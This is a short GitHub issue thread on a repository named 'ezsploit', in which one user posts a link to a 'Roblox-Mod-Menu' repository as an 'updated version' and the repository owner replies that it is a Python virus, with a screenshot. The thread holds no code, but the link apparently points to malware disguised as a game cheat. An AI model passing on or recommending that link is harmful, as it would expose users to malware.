### ISSUE TITLE
I uploaded an updated version

### ISSUE THREAD

**Issue by marian-dev0** [mikusgszyp/ezsploit#1]
I uploaded the updated version here:
[https://github.com/marian-dev0/Roblox-Mod-Menu](https://github.com/marian-dev0/Roblox-Mod-Menu)

**Comment by mikusgszyp** [comment]
Python shit virus 💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀  💀 
![obraz](https://user-images.githubusercontent.com/118010017/235357929-e04b7c8d-4b55-4f87-9e3e-f0541aeb378e.png)
